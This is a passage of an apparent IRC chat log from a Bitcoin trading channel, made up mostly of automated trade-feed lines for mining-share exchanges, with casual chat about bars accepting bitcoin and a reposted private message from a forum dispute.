0.008 BTC [-] Jun 29 17:49:41 theres some related bitbet i think Jun 29 17:49:42 If you are we should get some bars signed up for BTC so we can buy beer. Jun 29 17:52:06 [BTCTC] [AMC-PT] 3 @ 0.001998 = 0.006 BTC [+] Jun 29 17:55:34 [BTCTC] [ASICMINER-PT] 1 @ 3.546991 BTC [-] Jun 29 17:55:57 i'm about 6hrs from Atlanta Jun 29 17:56:05 [BTCTC] [AMC-PT] 1 @ 0.00153 BTC [-] Jun 29 17:56:07 [BTCTC] [AMC-PT] 13 @ 0.0015 = 0.0195 BTC [-] Jun 29 17:56:09 [BTCTC] [BASIC-MINING] 1 @ 0.181818 BTC [-] Jun 29 17:56:11 [BTCTC] [AMC-PT] 200 @ 0.0015 = 0.3 BTC [-] Jun 29 17:56:12 [BTCTC] [AMC-PT] 339 @ 0.001452 = 0.4922 BTC [-] Jun 29 17:56:37 where i am, people would be like buttcoinz? get outta here you yankee! Jun 29 17:57:10 [BTCTC] [TAT.ASICMINER] 18 @ 0.035 = 0.63 BTC [+] Jun 29 17:57:14 [BTCTC] [TAT.ASICMINER] 23 @ 0.035 = 0.805 BTC [+] Jun 29 17:57:21 [BTCTC] [CRYPTO-TRADE] 75 @ 0.2 = 15 BTC [+] Jun 29 17:59:57 ThickAsThieves: seriously? We should try to get Cypress Pint and Place on board Jun 29 18:00:02 or other small mom and pop bars Jun 29 18:00:23 [BTCTC] [AMC-PT] 1000 @ 0.0015 = 1.5 BTC [+] Jun 29 18:00:27 [BTCTC] [AMC-PT] 520 @ 0.001452 = 0.755 BTC [-] Jun 29 18:00:31 [BTCTC] [AMC-PT] 90 @ 0.001451 = 0.1306 BTC [-] Jun 29 18:00:35 [BTCTC] [AMC-PT] 310 @ 0.00145 = 0.4495 BTC [-] Jun 29 18:00:39 [BTCTC] [AMC-PT] 1 @ 0.001427 BTC [-] Jun 29 18:00:43 [BTCTC] [AMC-PT] 1000 @ 0.001351 = 1.351 BTC [-] Jun 29 18:00:47 [BTCTC] [AMC-PT] 18 @ 0.0013 = 0.0234 BTC [-] Jun 29 18:00:50 [BTCTC] [AMC-PT] 100 @ 0.0013 = 0.13 BTC [-] Jun 29 18:00:54 [BTCTC] [AMC-PT] 800 @ 0.00125 = 1 BTC [-] Jun 29 18:00:57 [BTCTC] [AMC-PT] 200 @ 0.001201 = 0.2402 BTC [-] Jun 29 18:00:59 [BTCTC] [AMC-PT] 100 @ 0.00113 = 0.113 BTC [-] Jun 29 18:01:00 [BTCTC] [AMC-PT] 100 @ 0.001114 = 0.1114 BTC [-] Jun 29 18:01:48 6hrs is a lil too far for me to be trying to change Atlanta Jun 29 18:02:03 LOL Jun 29 18:02:04 [HAVELOCK] [ASICM] 100 @ 0.034 = 3.4 BTC [-] Jun 29 18:02:07 you live in the country Jun 29 18:02:21 [HAVELOCK] [ASICM] 30 @ 0.034 = 1.02 BTC [-] Jun 29 18:02:28 [HAVELOCK] [ASICM] 8 @ 0.034 = 0.272 BTC [-] Jun 29 18:03:15 [BTCTC] [AMC-PT] 1000 @ 0.001113 = 1.113 BTC [-] Jun 29 18:04:15 [BTCTC] [AMC-PT] 100 @ 0.001113 = 0.1113 BTC [-] Jun 29 18:04:47 [BTCTC] [AMC-PT] 661 @ 0.001113 = 0.7357 BTC [-] Jun 29 18:05:11 [HAVELOCK] [ASICM] 2 @ 0.034 = 0.068 BTC [-] Jun 29 18:07:45 [BTCTC] [ASICMINER-PT] 4 @ 3.546979 = 14.1879 BTC [-] Jun 29 18:11:28 [BTCTC] [AMC-PT] 1 @ 0.001117 BTC [+] Jun 29 18:12:53 [BTCTC] [TAT.ASICMINER] 11 @ 0.035 = 0.385 BTC [+] Jun 29 18:13:28 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004852 BTC [-] Jun 29 18:23:21 [HAVELOCK] [ASICM] 46 @ 0.034 = 1.564 BTC [-] Jun 29 18:23:35 [HAVELOCK] [ASICM] 100 @ 0.03429 = 3.429 BTC [+] Jun 29 18:23:52 [HAVELOCK] [ASICM] 14 @ 0.03429 = 0.4801 BTC [+] Jun 29 18:24:06 [HAVELOCK] [ASICM] 8 @ 0.0344 = 0.2752 BTC [+] Jun 29 18:24:10 [BTCTC] [ASICMINER-PT] 2 @ 3.547 = 7.094 BTC [+] Jun 29 18:24:12 [BTCTC] [ASICMINER-PT] 1 @ 3.548 BTC [+] Jun 29 18:24:14 [BTCTC] [ASICMINER-PT] 2 @ 3.55 = 7.1 BTC [+] Jun 29 18:24:16 [BTCTC] [ASICMINER-PT] 2 @ 3.557 = 7.114 BTC [+] Jun 29 18:24:17 [BTCTC] [ASICMINER-PT] 2 @ 3.559 = 7.118 BTC [+] Jun 29 18:24:18 [BTCTC] [ASICMINER-PT] 2 @ 3.561 = 7.122 BTC [+] Jun 29 18:24:27 [BTCTC] [ASICMINER-PT] 1 @ 3.563 BTC [+] Jun 29 18:24:29 [BTCTC] [ASICMINER-PT] 1 @ 3.565 BTC [+] Jun 29 18:24:31 [BTCTC] [ASICMINER-PT] 2 @ 3.567 = 7.134 BTC [+] Jun 29 18:24:33 [BTCTC] [ASICMINER-PT] 2 @ 3.569 = 7.138 BTC [+] Jun 29 18:24:35 [BTCTC] [ASICMINER-PT] 1 @ 3.5699 BTC [+] Jun 29 18:24:40 [BTCTC] [ASICMINER-PT] 2 @ 3.57 = 7.14 BTC [+] Jun 29 18:24:43 [BTCTC] [ASICMINER-PT] 5 @ 3.58 = 17.9 BTC [+] Jun 29 18:25:22 [BTCTC] [TAT.ASICMINER] 34 @ 0.035 = 1.19 BTC [+] Jun 29 18:25:24 [BTCTC] [TAT.ASICMINER] 35 @ 0.035 = 1.225 BTC [+] Jun 29 18:27:40 [HAVELOCK] [ASICM] 500 @ 0.03449 = 17.245 BTC [+] Jun 29 18:27:41 [BTCTC] [ASICMINER-PT] 3 @ 3.578999 = 10.737 BTC [-] Jun 29 18:28:51 [HAVELOCK] [ASICM] 69 @ 0.0345 = 2.3805 BTC [+] Jun 29 18:29:14 [HAVELOCK] [ASICM] 10 @ 0.0345 = 0.345 BTC [+] Jun 29 18:29:20 [BTCTC] [TAT.ASICMINER] 40 @ 0.0352 = 1.408 BTC [+] Jun 29 18:29:29 [BTCTC] [DMS.PURCHASE] 1 @ 0.053583 BTC [-] Jun 29 18:29:41 [BTCTC] [ASICMINER-PT] 1 @ 3.579 BTC [+] Jun 29 18:29:43 [BTCTC] [ASICMINER-PT] 1 @ 3.599 BTC [+] Jun 29 18:29:49 [HAVELOCK] [ASICM] 4 @ 0.0345 = 0.138 BTC [+] Jun 29 18:30:18 [BTCTC] [ASICMINER-PT] 1 @ 3.5999 BTC [+] Jun 29 18:30:23 [BTCTC] [ASICMINER-PT] 3 @ 3.6 = 10.8 BTC [+] Jun 29 18:30:49 [BTCTC] [TAT.ASICMINER] 40 @ 0.0353 = 1.412 BTC [+] Jun 29 18:30:54 [BTCTC] [TAT.ASICMINER] 17 @ 0.0354 = 0.6018 BTC [+] Jun 29 18:31:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.0354 BTC [+] Jun 29 18:31:18 ;;ticker Jun 29 18:31:19 MtGox BTCUSD ticker | Best bid: 96.50791, Best ask: 96.53689, Bid-ask spread: 0.02898, Last trade: 96.53689, 24 hour volume: 37003.24439190, 24 hour low: 92.25000, 24 hour high: 100.43980, 24 hour vwap: 96.07004 Jun 29 18:32:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.0354 BTC [+] Jun 29 18:32:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.0354 BTC [+] Jun 29 18:33:41 [BTCTC] [TAT.ASICMINER] 7 @ 0.0355 = 0.2485 BTC [+] Jun 29 18:33:43 [BTCTC] [TAT.ASICMINER] 30 @ 0.0355 = 1.065 BTC [+] Jun 29 18:33:44 [BTCTC] [TAT.ASICMINER] 2 @ 0.0356 = 0.0712 BTC [+] Jun 29 18:34:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.03575 BTC [+] Jun 29 18:35:08 [BTCTC] [TAT.ASICMINER] 20 @ 0.03575 = 0.715 BTC [+] Jun 29 18:35:12 [BTCTC] [TAT.ASICMINER] 4 @ 0.03575 = 0.143 BTC [+] Jun 29 18:35:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.03575 = 0.0715 BTC [+] Jun 29 18:35:55 [BTCTC] [TAT.ASICMINER] 18 @ 0.03575 = 0.6435 BTC [+] Jun 29 18:35:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.0359 BTC [+] Jun 29 18:36:00 [BTCTC] [TAT.ASICMINER] 100 @ 0.0359 = 3.59 BTC [+] Jun 29 18:36:01 [BTCTC] [TAT.ASICMINER] 35 @ 0.03591 = 1.2569 BTC [+] Jun 29 18:36:09 [BTCTC] [TAT.ASICMINER] 100 @ 0.035999 = 3.5999 BTC [+] Jun 29 18:37:14 [BTCTC] [TAT.ASICMINER] 350 @ 0.036 = 12.6 BTC [+] Jun 29 18:37:16 [BTCTC] [TAT.ASICMINER] 15 @ 0.036 = 0.54 BTC [+] Jun 29 18:37:35 come to papa Jun 29 18:38:23 [HAVELOCK] [ASICM] 6 @ 0.0345 = 0.207 BTC [+] Jun 29 18:38:30 [HAVELOCK] [ASICM] 25 @ 0.0347 = 0.8675 BTC [+] Jun 29 18:38:49 [HAVELOCK] [ASICM] 27 @ 0.034891 = 0.9421 BTC [+] Jun 29 18:38:55 [BTCTC] [TAT.ASICMINER] 24 @ 0.0365 = 0.876 BTC [+] Jun 29 18:39:13 [BTCTC] [ASICMINER-PT] 1 @ 3.599 BTC [-] Jun 29 18:39:15 [BTCTC] [ASICMINER-PT] 9 @ 3.6 = 32.4 BTC [+] Jun 29 18:45:30 [BTCTC] [ASICMINER-PT] 2 @ 3.659 = 7.318 BTC [+] Jun 29 18:45:35 [BTCTC] [ASICMINER-PT] 3 @ 3.66 = 10.98 BTC [+] Jun 29 18:46:06 [HAVELOCK] [ASICM] 124 @ 0.034891 = 4.3265 BTC [+] Jun 29 18:46:37 [BTCTC] [ASICMINER-PT] 4 @ 3.69 = 14.76 BTC [+] Jun 29 18:48:17 [HAVELOCK] [ASICM] 133 @ 0.0349 = 4.6417 BTC [+] Jun 29 18:48:55 ;;bcstats Jun 29 18:48:58 Current Blocks: 243944 | Current Difficulty: 2.1335329113983E7 | Next Difficulty At Block: 245951 | Next Difficulty In: 2007 blocks | Next Difficulty In About: 1 week, 5 days, 0 hours, 25 minutes, and 52 seconds | Next Difficulty Estimate: 23379082.0677 | Estimated Percent Change: 9.5792 Jun 29 18:49:06 [MPEX] [S.MPOE] 7703 @ 0.00082406 = 6.3477 BTC [-] Jun 29 18:49:21 [BTCTC] [TAT.ASICMINER] 37 @ 0.0365 = 1.3505 BTC [+] Jun 29 18:50:46 [BTCTC] [ASICMINER-PT] 1 @ 3.555 BTC [-] Jun 29 18:53:12 [HAVELOCK] [ASICM] 40 @ 0.0349 = 1.396 BTC [+] Jun 29 18:53:14 [HAVELOCK] [ASICM] 2 @ 0.0349 = 0.0698 BTC [+] Jun 29 18:53:25 [HAVELOCK] [ASICM] 3 @ 0.0349 = 0.1047 BTC [+] Jun 29 18:54:27 [BTCTC] [TAT.ASICMINER] 39 @ 0.0365 = 1.4235 BTC [+] Jun 29 18:54:48 [BTCTC] [S.MPOE-PT] 8 @ 0.000999 = 0.008 BTC [-] Jun 29 18:56:52 [BTCTC] [ASICMINER-PT] 2 @ 3.689 = 7.378 BTC [+] Jun 29 18:56:54 [BTCTC] [ASICMINER-PT] 2 @ 3.69 = 7.38 BTC [+] Jun 29 18:57:09 [HAVELOCK] [KCIM] 1 @ 0.9999 BTC [+] Jun 29 18:58:15 [BTCTC] [TAT.ASICMINER] 27 @ 0.0371 = 1.0017 BTC [+] Jun 29 18:58:17 [BTCTC] [TAT.ASICMINER] 8 @ 0.03788 = 0.303 BTC [+] Jun 29 18:58:18 [BTCTC] [ASICMINER-PT] 4 @ 3.69 = 14.76 BTC [+] Jun 29 18:58:50 [BTCTC] [TAT.ASICMINER] 4 @ 0.03788 = 0.1515 BTC [+] Jun 29 19:00:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.03788 BTC [+] Jun 29 19:00:36 ok slow down now AM Jun 29 19:01:23 [BTCTC] [ASICMINER-PT] 2 @ 3.749 = 7.498 BTC [+] Jun 29 19:01:29 [BTCTC] [ASICMINER-PT] 1 @ 3.7495 BTC [+] Jun 29 19:01:34 [BTCTC] [ASICMINER-PT] 1 @ 3.75 BTC [+] Jun 29 19:04:52 [BTCTC] [TAT.ASICMINER] 9 @ 0.03788 = 0.3409 BTC [+] Jun 29 19:05:16 [BTCTC] [AMC-PT] 27 @ 0.001118 = 0.0302 BTC [+] Jun 29 19:07:41 [BTCTC] [TAT.ASICMINER] 20 @ 0.03788 = 0.7576 BTC [+] Jun 29 19:08:12 [BTCTC] [AMC-PT] 10 @ 0.0013 = 0.013 BTC [+] Jun 29 19:08:14 [BTCTC] [AMC-PT] 10 @ 0.00135 = 0.0135 BTC [+] Jun 29 19:08:45 [BTCTC] [BASIC-MINING] 1 @ 0.194628 BTC [+] Jun 29 19:09:06 [BTCTC] [AMC-PT] 10 @ 0.0014 = 0.014 BTC [+] Jun 29 19:09:23 [BTCTC] [TAT.ASICMINER] 10 @ 0.03788 = 0.3788 BTC [+] Jun 29 19:10:13 [BTCTC] [AMC-PT] 10 @ 0.00145 = 0.0145 BTC [+] Jun 29 19:10:24 [HAVELOCK] [ASICM] 10 @ 0.03489999 = 0.349 BTC [-] Jun 29 19:10:25 [HAVELOCK] [ASICM] 455 @ 0.0349 = 15.8795 BTC [+] Jun 29 19:10:27 [HAVELOCK] [ASICM] 30 @ 0.034999 = 1.05 BTC [+] Jun 29 19:10:28 [HAVELOCK] [ASICM] 250 @ 0.035 = 8.75 BTC [+] Jun 29 19:10:29 [HAVELOCK] [ASICM] 500 @ 0.035 = 17.5 BTC [+] Jun 29 19:10:30 [HAVELOCK] [ASICM] 107 @ 0.035 = 3.745 BTC [+] Jun 29 19:10:31 [HAVELOCK] [ASICM] 107 @ 0.035 = 3.745 BTC [+] Jun 29 19:10:32 [HAVELOCK] [ASICM] 250 @ 0.036 = 9 BTC [+] Jun 29 19:10:57 [BTCTC] [AMC-PT] 10 @ 0.0015 = 0.015 BTC [+] Jun 29 19:11:07 [HAVELOCK] [ASICM] 2 @ 0.03600001 = 0.072 BTC [+] Jun 29 19:11:09 [HAVELOCK] [ASICM] 48 @ 0.036 = 1.728 BTC [-] Jun 29 19:11:12 [HAVELOCK] [ASICM] 40 @ 0.0365 = 1.46 BTC [+] Jun 29 19:11:18 [MPEX] [S.MPOE] 497 @ 0.00082406 = 0.4096 BTC [-] Jun 29 19:11:34 [MPEX] [S.MPOE] 7853 @ 0.00082337 = 6.4659 BTC [-] Jun 29 19:11:36 [HAVELOCK] [ASICM] 33 @ 0.0365 = 1.2045 BTC [+] Jun 29 19:11:44 [HAVELOCK] [ASICM] 265 @ 0.0365 = 9.6725 BTC [+] Jun 29 19:12:06 [BTCTC] [AMC-PT] 10 @ 0.00155 = 0.0155 BTC [+] Jun 29 19:13:05 [BTCTC] [AMC-PT] 10 @ 0.0015 = 0.015 BTC [-] Jun 29 19:13:23 [HAVELOCK] [ASICM] 10 @ 0.037 = 0.37 BTC [+] Jun 29 19:13:53 [BTCTC] [AMC-PT] 240 @ 0.0015 = 0.36 BTC [-] Jun 29 19:14:31 [HAVELOCK] [ASICM] 7 @ 0.037 = 0.259 BTC [+] Jun 29 19:14:36 [BTCTC] [AMC-PT] 10 @ 0.0016 = 0.016 BTC [+] Jun 29 19:14:48 [BTCTC] [CRYPTO-TRADE] 18 @ 0.2 = 3.6 BTC [+] Jun 29 19:15:19 [HAVELOCK] [SDICE] 62 @ 0.172 = 10.664 BTC [+] Jun 29 19:15:21 [HAVELOCK] [SDICE] 7 @ 0.18 = 1.26 BTC [+] Jun 29 19:15:27 [BTCTC] [AMC-PT] 10 @ 0.00165 = 0.0165 BTC [+] Jun 29 19:15:42 [HAVELOCK] [SDICE] 4 @ 0.19699899 = 0.788 BTC [+] Jun 29 19:15:44 [HAVELOCK] [SDICE] 10 @ 0.19699899 = 1.97 BTC [+] Jun 29 19:15:45 [HAVELOCK] [SDICE] 17 @ 0.197 = 3.349 BTC [+] Jun 29 19:20:34 [BTCTC] [TAT.ASICMINER] 125 @ 0.0367 = 4.5875 BTC [-] Jun 29 19:20:58 [BTCTC] [DMS.SELLING] 87 @ 0.033478 = 2.9126 BTC [+] Jun 29 19:21:19 [BTCTC] [TAT.ASICMINER] 10 @ 0.03787 = 0.3787 BTC [+] Jun 29 19:22:05 [BTCTC] [DMS.MINING] 1 @ 0.022999 BTC [+] Jun 29 19:22:20 [BTCTC] [DMS.SELLING] 20 @ 0.03447 = 0.6894 BTC [+] Jun 29 19:22:42 [HAVELOCK] [ASICM] 200 @ 0.037 = 7.4 BTC [+] Jun 29 19:22:49 [MPEX] [S.DICE] 1000 @ 0.00200001 = 2 BTC [+] Jun 29 19:22:51 [MPEX] [S.DICE] 9000 @ 0.002 = 18 BTC [-] Jun 29 19:23:00 [BTCTC] [TAT.ASICMINER] 50 @ 0.036601 = 1.8301 BTC [-] Jun 29 19:23:02 [BTCTC] [TAT.ASICMINER] 40 @ 0.036 = 1.44 BTC [-] Jun 29 19:23:32 [BTCTC] [DMS.SELLING] 5 @ 0.03447 = 0.1724 BTC [+] Jun 29 19:23:34 [BTCTC] [DMS.SELLING] 75 @ 0.034476 = 2.5857 BTC [+] Jun 29 19:23:58 [BTCTC] [DMS.SELLING] 15 @ 0.034476 = 0.5171 BTC [+] Jun 29 19:25:02 [BTCTC] [ASICMINER-PT] 1 @ 3.789 BTC [+] Jun 29 19:26:10 [BTCTC] [ASICMINER-PT] 1 @ 3.799 BTC [+] Jun 29 19:27:12 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] Jun 29 19:28:26 [HAVELOCK] [ASICM] 33 @ 0.037 = 1.221 BTC [+] Jun 29 19:28:27 [HAVELOCK] [ASICM] 17 @ 0.037 = 0.629 BTC [+] Jun 29 19:32:41 [BTCTC] [BASIC-MINING] 1 @ 0.181911 BTC [-] Jun 29 19:32:48 [BTCTC] [COGNITIVE] 5 @ 0.534 = 2.67 BTC [+] Jun 29 19:35:09 [BTCTC] [BASIC-MINING] 9 @ 0.182002 = 1.638 BTC [+] Jun 29 19:35:11 [BTCTC] [BASIC-MINING] 11 @ 0.182001 = 2.002 BTC [-] Jun 29 19:35:20 [BTCTC] [BASIC-MINING] 15 @ 0.182 = 2.73 BTC [-] Jun 29 19:35:22 [BTCTC] [BASIC-MINING] 10 @ 0.181904 = 1.819 BTC [-] Jun 29 19:35:24 [BTCTC] [BASIC-MINING] 10 @ 0.1819 = 1.819 BTC [-] Jun 29 19:35:26 [BTCTC] [BASIC-MINING] 2 @ 0.181818 = 0.3636 BTC [-] Jun 29 19:35:34 [BTCTC] [RSM] 15 @ 0.0175 = 0.2625 BTC [+] Jun 29 19:35:36 [BTCTC] [RSM] 20 @ 0.0174 = 0.348 BTC [-] Jun 29 19:35:45 [BTCTC] [RSM] 64 @ 0.01725 = 1.104 BTC [-] Jun 29 19:35:47 [BTCTC] [RSM] 80 @ 0.01724 = 1.3792 BTC [-] Jun 29 19:35:48 [BTCTC] [RSM] 10 @ 0.01724 = 0.1724 BTC [-] Jun 29 19:35:54 https://bitcointalk.org/index.php?topic=245375.msg2612750#msg2612750 Jun 29 19:35:56 fun Jun 29 19:36:01 [FIMB] Fixed-Interest-Mining-Bond on BTC-TC Jun 29 19:36:02 [HAVELOCK] [ASICM] 15 @ 0.037 = 0.555 BTC [+] Jun 29 19:36:20 [HAVELOCK] [ASICM] 6 @ 0.037 = 0.222 BTC [+] Jun 29 19:36:43 [BTCTC] [TAT.ASICMINER] 18 @ 0.037869 = 0.6816 BTC [+] Jun 29 19:37:46 [BTCTC] [DMS.MINING] 2 @ 0.022999 = 0.046 BTC [+] Jun 29 19:38:07 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.005092 = 0.2546 BTC [+] Jun 29 19:38:08 he pm'd me Jun 29 19:38:20 "Hey, Jun 29 19:38:20 I'd appreciate you removing your feedback against me, because Inaba forced and blackmailed me into admitting that the werner account was me, and threatened to cancel my tens of thousands of dollars worth of pre-orders if I refused to admit it was me. I did this in the best interest of my shareholders who the preorders belonged to. Jun 29 19:38:20 Thanks for understanding." Jun 29 19:38:24 i replied: Jun 29 19:38:26 [BTCTC] [COGNITIVE] 27 @ 0.534 = 14.418 BTC [+] Jun 29 19:38:26 [BTCTC] [COGNITIVE] 1 @ 0.480201 BTC [-] Jun 29 19:38:35 "Who forced you to sock up your own auctions though?" Jun 29 19:39:00 hahaha Jun 29 19:39:03 [BTCTC] [BASIC-MINING] 5 @ 0.181818 = 0.9091 BTC [-] Jun 29 19:39:05 [BTCTC] [BASIC-MINING] 1 @ 0.1818 BTC [-] Jun 29 19:39:07 [BTCTC] [BASIC-MINING] 5 @ 0.1805 = 0.9025 BTC [-] Jun 29 19:39:09 [BTCTC] [BASIC-MINING] 1 @ 0.1805 BTC [-] Jun 29 19:39:10 [BTCTC] [BASIC-MINING] 1 @ 0.1804 BTC [-] Jun 29 19:39:12 [BTCTC] [BASIC-MINING] 1 @ 0.18 BTC [-] Jun 29 19:39:20 ThickAsThieves: what is this? Jun 29 19:39:36 [BTCTC] [TAT.ASICMINER] 4 @ 0.037869 = 0.1515 BTC [+] Jun 29 19:39:39 id be careful with posting pms, no matter how idiotic they are Jun 29 19:39:46 some forums get you banned for it Jun 29 19:39:52 i dunno if bitcointalk Jun 29 19:39:58 havent really read the rules Jun 29 19:40:00 word Jun 29 19:40:09 noted Jun 29 19:40:37 on bitcointalk theymos does it. but neverthel;ess, i wouldn't really post pms. Jun 29 19:40:45 [BTCTC] [DMS.SELLING] 5 @ 0.034475 = 0.1724 BTC [-] Jun 29 19:40:52 [HAVELOCK] [ASICM] 90 @ 0.037 = 3.33 BTC [+] Jun 29 19:41:02 mircea_popescu: I have a question for you Jun 29 19:41:11 Why do people use museums for clandestine meetings? Jun 29 19:41:31 i have no idea Jun 29 19:42:17 [BTCTC] [DMS.PURCHASE] 27 @ 0.053474 = 1.4438 BTC [-] Jun 29 19:42:36 [BTCTC] [S.DICE-PT] 2 @ 0.002 = 0.004 BTC [-] Jun 29 19:42:59 [BTCTC] [ASICMINER-PT] 1 @ 3.8 BTC [+] Jun 29 19:43:06 [BTCTC] [CRYPTO-TRADE] 10 @ 0.199 = 1.99 BTC [-] Jun 29 19:43:08 [BTCTC] [CRYPTO-TRADE] 8 @ 0.199 = 1.592 BTC [-] Jun 29 19:43:10 [BTCTC] [CRYPTO-TRADE] 31 @ 0.199 = 6.169 BTC [-] Jun 29 19:43:11 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199 BTC [-] Jun 29 19:43:17 [BTCTC] [DMS.MINING] 12 @ 0.021002 = 0.252 BTC [-] Jun 29 19:44:09 [BTCTC] [ASICMINER-PT] 2 @ 3.799 = 7.598 BTC [-] Jun 29 19:44:11 [BTCTC] [ASICMINER-PT] 2 @ 3.8 = 7.6 BTC [+] Jun 29 19:44:13 [BTCTC] [DMS.MINING] 103 @ 0.021001 = 2.1631 BTC [-] Jun 29 19:44:20 3.8 ... Jun 29 19:44:52 [HAVELOCK] [ASICM] 250 @ 0.037 = 9.25 BTC [+] Jun 29 19:44:59 [BTCTC] [ASICMINER-PT] 2 @ 3.849 = 7.698 BTC [+] Jun 29 19:45:14 looks like 4btc Jun 29 19:45:18 [BTCTC] [DMS.PURCHASE] 150 @ 0.053474 = 8.0211 BTC [-] Jun 29 19:45:32 [BTCTC] [AMC-PT] 1 @ 0.0017 BTC [+] Jun 29 19:46:15 [BTCTC] [BASIC-MINING] 3 @ 0.1792 = 0.5376 BTC [-] Jun 29 19:46:17 [BTCTC] [BASIC-MINING] 1 @ 0.1791 BTC [-] Jun 29 19:46:19 [BTCTC] [BASIC-MINING] 100 @ 0.165001 = 16.5001 BTC [-] Jun 29 19:46:20 [BTCTC] [BASIC-MINING] 3 @ 0.165001 = 0.495 BTC [-] Jun 29 19:46:26 crazy Jun 29 19:46:29 [BTCTC] [ASICMINER-PT] 1 @ 3.849 BTC [+] Jun 29 19:46:31 [BTCTC] [ASICMINER-PT] 1 @ 3.8 BTC [-] Jun 29 19:46:32 wish i bought more at ~1 Jun 29 19:46:35 :p Jun 29 19:46:40 [HAVELOCK] [ASICM] 104 @ 0.037 = 3.848 BTC [+] Jun 29 19:46:53 just like i wish i didn't sell over 10000 BTC at $0.04 3 years ago Jun 29 19:46:58 topace pm Jun 29 19:46:59 oh bitcoin, hindsight fucks me every time Jun 29 19:47:13 [BTCTC] [DMS.MINING] 5 @ 0.022999 = 0.115 BTC [+] Jun 29 19:47:44 [BTCTC] [DMS.PURCHASE] 3 @ 0.053474 = 0.1604 BTC [-] Jun 29 19:48:13 [BTCTC] [COGNITIVE] 1 @ 0.480201 BTC [-] Jun 29 19:48:15 [BTCTC] [COGNITIVE] 4 @ 0.4802 = 1.9208 BTC [-] Jun 29 19:48:17 [BTCTC] [COGNITIVE] 5 @ 0.45016 = 2.2508 BTC [-] Jun 29 19:49:06 [BTCTC] [TAT.ASICMINER] 6 @ 0.037869 = 0.2272 BTC [+] Jun 29 19:49:28 [BTCTC] [LTC-MINING] 1 @ 0.292 BTC [-] Jun 29 19:49:59 [BTCTC] [ASICMINER-PT] 2 @ 3.892 = 7.784 BTC [+] Jun 29 19:50:01 [BTCTC] [ASICMINER-PT] 1 @ 3.892 BTC [+] Jun 29 19:50:15 [BTCTC] [BASIC-MINING] 1 @ 0.165001 BTC [-] Jun 29 19:50:20 [BTCTC] [DMS.MINING] 70 @ 0.021001 = 1.4701 BTC [-] Jun 29 19:50:47 [BTCTC] [DMS.PURCHASE] 30 @ 0.053474 = 1.6042 BTC [-] Jun 29 19:51:30 [BTCTC] [DMS.MINING] 27 @ 0.021001 = 0.567 BTC [-] Jun 29 19:54:46 [BTCTC] [ASICMINER-PT] 2 @ 3.896 = 7.792 BTC [+] Jun 29 19:54:48 [BTCTC] [ASICMINER-PT] 2 @ 3.897 = 7.794 BTC [+] Jun 29 19:55:09 [BTCTC] [DMS.PURCHASE] 50 @ 0.0515 = 2.575 BTC [-] Jun 29 19:55:11 [BTCTC] [DMS.PURCHASE] 1 @ 0.0511 BTC [-] Jun 29 19:55:12 [BTCTC] [DMS.PURCHASE] 72 @ 0.050011 = 3.6008 BTC [-] Jun 29 19:55:28 [BTCTC] [BASIC-MINING] 1 @ 0.162 BTC [-] Jun 29 19:56:07 [BTCTC] [ASICMINER-PT] 2 @ 3.75 = 7.5 BTC [-] Jun 29 19:56:58 [BTCTC] [COGNITIVE] 11 @ 0.45015 = 4.9517 BTC [-] Jun 29 19:58:54 [BTCTC] [ASICMINER-PT] 1 @ 3.8959 BTC [+] Jun 29 19:59:35 [BTCTC] [ASICMINER-PT] 2 @ 3.8959 = 7.7918 BTC [+] Jun 29 20:00:11 [BTCTC] [ASICMINER-PT] 1 @ 3.896 BTC [+] Jun 29 20:01:00 [BTCTC] [ASICMINER-PT] 5 @ 3.897 = 19.485 BTC [+] Jun 29 20:01:10 [BTCTC] [ASICMINER-PT] 1 @ 3.897 BTC [+] Jun 29 20:01:25 [BTCTC] [GSDPT] 100 @ 0.002118 = 0.2118 BTC [+] Jun 29 20:01:26 [BTCTC] [GSDPT] 3 @ 0.002117 = 0.0064 BTC [-] Jun 29 20:01:28 [BTCTC] [GSDPT] 897 @ 0.002115 = 1.8972 BTC [-] Jun 29 20:01:55 [BTCTC] [ASICMINER-PT] 1 @ 3.897 BTC [+] Jun 29 20:02:05 [BTCTC] [ASICMINER-PT] 2 @ 3.8959 = 7.7918 BTC [-] Jun 29 20:02:43 [BTCTC] [COGNITIVE] 4 @ 0.45015 = 1.8006 BTC [-] Jun 29 20:02:44 [BTCTC] [COGNITIVE] 10 @ 0.45014 = 4.5014 BTC [-] Jun 29 20:02:47 [BTCTC] [COGNITIVE] 10 @ 0.4501 = 4.501 BTC [-] Jun 29 20:02:48 [BTCTC] [COGNITIVE] 3 @ 0.45 = 1.35 BTC [-] Jun 29 20:03:09 [BTCTC] [COGNITIVE] 1 @ 0.534999 BTC [+] Jun 29 20:03:14 [BTCTC] [ASICMINER-PT] 1 @ 3.899 BTC [+] Jun 29 20:03:33 [BTCTC] [ASICMINER-PT] 2 @ 3.85 = 7.7 BTC [-] Jun 29 20:03:48 [BTCTC] [DMS.SELLING] 20 @ 0.0339 = 0.678 BTC [-] Jun 29 20:05:28 [BTCTC] [TAT.ASICMINER] 22 @ 0.037869 = 0.8331 BTC [+] Jun 29 20:07:08 [BTCTC] [TAT.ASICMINER] 20 @ 0.03787 = 0.7574 BTC [+] Jun 29 20:07:10 [BTCTC] [TAT.ASICMINER] 28 @ 0.03788 = 1.0606 BTC [+] Jun 29 20:07:16 [BTCTC] [TAT.ASICMINER] 72 @ 0.0397 = 2.8584 BTC [+] Jun 29 20:07:21 [BTCTC] [AMC-PT] 7 @ 0.00115 = 0.0081 BTC [-] Jun 29 20:07:43 [BTCTC] [AMC-PT] 10 @ 0.001119 = 0.0112 BTC [-] Jun 29 20:07:45 [BTCTC] [AMC-PT] 25 @ 0.001119 = 0.028 BTC [-] Jun 29 20:08:12 [BTCTC] [AMC-PT] 31 @ 0.001118 = 0.0347 BTC [-] Jun 29 20:08:51 [BTCTC] [TAT.ASICMINER] 2 @ 0.0397 = 0.0794 BTC [+] Jun 29 20:10:05 [BTCTC] [TAT.ASICMINER] 10 @ 0.034 = 0.34 BTC [-] Jun 29 20:10:55 [BTCTC] [AMC-PT] 7 